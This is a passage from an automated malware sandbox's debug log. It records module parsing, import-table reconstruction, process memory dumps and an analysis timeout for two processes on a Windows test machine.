2020-03-24 10:13:54,487 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\psapi.dll
2020-03-24 10:13:54,503 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\oleaut32.dll
2020-03-24 10:13:54,503 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\oleaut32.dll
2020-03-24 10:13:54,503 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\version.dll
2020-03-24 10:13:54,503 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\version.dll
2020-03-24 10:13:54,519 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,519 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:54,533 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
2020-03-24 10:13:54,533 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
2020-03-24 10:13:54,549 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\imm32.dll
2020-03-24 10:13:54,549 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\imm32.dll
2020-03-24 10:13:54,549 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:54,565 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msctf.dll
2020-03-24 10:13:54,565 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msctf.dll
2020-03-24 10:13:54,565 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:54,581 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shell32.dll
2020-03-24 10:13:54,596 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,596 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,596 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,611 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,611 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,628 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,628 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,628 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,644 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,644 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,644 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,644 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,658 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,658 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,674 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,674 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,674 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,690 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,690 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,690 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,690 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,690 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,706 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,706 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,706 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,706 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,721 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:54,721 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\urlmon.dll
2020-03-24 10:13:54,721 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\urlmon.dll
2020-03-24 10:13:54,736 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\wininet.dll
2020-03-24 10:13:54,736 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\wininet.dll
2020-03-24 10:13:54,736 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\iertutil.dll
2020-03-24 10:13:54,753 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\iertutil.dll
2020-03-24 10:13:54,753 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\crypt32.dll
2020-03-24 10:13:54,753 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\crypt32.dll
2020-03-24 10:13:54,753 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msasn1.dll
2020-03-24 10:13:54,753 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msasn1.dll
2020-03-24 10:13:54,767 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\apphelp.dll
2020-03-24 10:13:54,767 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\apphelp.dll
2020-03-24 10:13:54,767 [root] DEBUG: DumpProcessFixImports: Instantiating PeParser with address: 0x00400000
2020-03-24 10:13:54,767 [root] DEBUG: DumpProcessFixImports: Module entry point VA is 0x0046012C
2020-03-24 10:13:54,767 [root] DEBUG: Module image dump success
2020-03-24 10:13:54,783 [root] DEBUG: DumpProcessFixImports: Found IAT - 0x4de128, size: 0x694
2020-03-24 10:13:54,783 [root] DEBUG: IAT parsing finished, found 407 valid APIs, missed 0 APIs
2020-03-24 10:13:54,783 [root] DEBUG: Adding module to module list: kernel32.dll
2020-03-24 10:13:54,799 [root] DEBUG: Adding module to module list: user32.dll
2020-03-24 10:13:54,799 [root] DEBUG: Adding module to module list: advapi32.dll
2020-03-24 10:13:54,799 [root] DEBUG: Adding module to module list: oleaut32.dll
2020-03-24 10:13:54,799 [root] DEBUG: Adding module to module list: kernel32.dll
2020-03-24 10:13:54,799 [root] DEBUG: Adding module to module list: advapi32.dll
2020-03-24 10:13:54,799 [root] DEBUG: Adding module to module list: kernel32.dll
2020-03-24 10:13:54,815 [root] DEBUG: Adding module to module list: version.dll
2020-03-24 10:13:54,815 [root] DEBUG: Adding module to module list: gdi32.dll
2020-03-24 10:13:54,815 [root] DEBUG: Adding module to module list: user32.dll
2020-03-24 10:13:54,815 [root] DEBUG: Adding module to module list: kernel32.dll
2020-03-24 10:13:54,815 [root] DEBUG: Adding module to module list: oleaut32.dll
2020-03-24 10:13:54,831 [root] DEBUG: Adding module to module list: comctl32.dll
2020-03-24 10:13:54,831 [root] DEBUG: Adding module to module list: kernel32.dll
2020-03-24 10:13:54,831 [root] DEBUG: Warning - IAT is not inside the PE image, requires rebasing.
2020-03-24 10:13:54,831 [root] DEBUG: Invalid PE file: import table rebuild failed.
2020-03-24 10:13:54,831 [root] DEBUG: Import table rebuild failed, falling back to unfixed dump.
2020-03-24 10:13:54,861 [root] INFO: Added new CAPE file to list with path: C:\uGrmFZ\CAPE\1964_139413844654132024232020
2020-03-24 10:13:54,892 [root] DEBUG: DumpInterestingRegions: Dumping calling region at 0x035A0000.
2020-03-24 10:13:54,892 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 10:13:54,892 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x035A0000.
2020-03-24 10:13:54,892 [root] DEBUG: DumpProcess: Module entry point VA is 0x000156F4.
2020-03-24 10:13:54,924 [root] INFO: Added new CAPE file to list with path: C:\uGrmFZ\CAPE\1964_125463227954132024232020
2020-03-24 10:13:54,924 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x82800.
2020-03-24 10:13:55,127 [root] DEBUG: DoProcessDump: Full process memory dump saved to file: C:\uGrmFZ\memory\1964.dmp.
2020-03-24 10:13:55,127 [root] DEBUG: DLL unloaded from 0x75140000.
2020-03-24 10:13:55,142 [root] INFO: Notified of termination of process with pid 1964.
2020-03-24 10:16:31,315 [root] INFO: Analysis timeout hit (200 seconds), terminating analysis.
2020-03-24 10:16:31,315 [root] INFO: Created shutdown mutex.
2020-03-24 10:16:32,328 [lib.api.process] INFO: Terminate event set for process 1540
2020-03-24 10:16:32,328 [root] DEBUG: Terminate Event: Attempting to dump process 1540
2020-03-24 10:16:32,328 [root] DEBUG: DoProcessDump: Created dump file for full process memory dump: C:\uGrmFZ\memory\1540.dmp.
2020-03-24 10:16:32,328 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00400000.
2020-03-24 10:16:32,344 [root] DEBUG: ApiReader: module list size: 56
2020-03-24 10:16:32,344 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,344 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,359 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:32,359 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:16:32,359 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,375 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,375 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,375 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,375 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,391 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,391 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,391 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,391 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,407 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,407 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,407 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,407 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,407 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,421 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,421 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,421 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,421 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,437 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,437 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,437 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,453 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,453 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,453 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,453 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,469 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,469 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,469 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,469 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,484 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,484 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,484 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,500 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,500 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,500 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,500 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,516 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,516 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,516 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,516 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,530 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,530 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,530 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,530 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,546 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,546 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,546 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,546 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,546 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,562 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,562 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,562 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,562 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,578 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,578 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,578 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,578 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,578 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,594 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,594 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,594 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,594 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,594 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,608 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,608 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,608 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,608 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,625 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:16:32,625 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:16:32,625 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,625 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,641 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,641 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,641 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,641 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,655 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,655 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,655 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,655 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,671 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,671 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,671 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,671 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,687 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,687 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,687 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,703 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,703 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,703 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,703 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,719 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,719 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,719 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,733 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,733 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,733 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,733 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,750 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,750 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,750 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,750 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,765 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,765 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,765 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,765 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,780 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,780 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,780 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,796 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,796 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,796 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,796 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,812 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,812 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,812 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:16:32,812 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
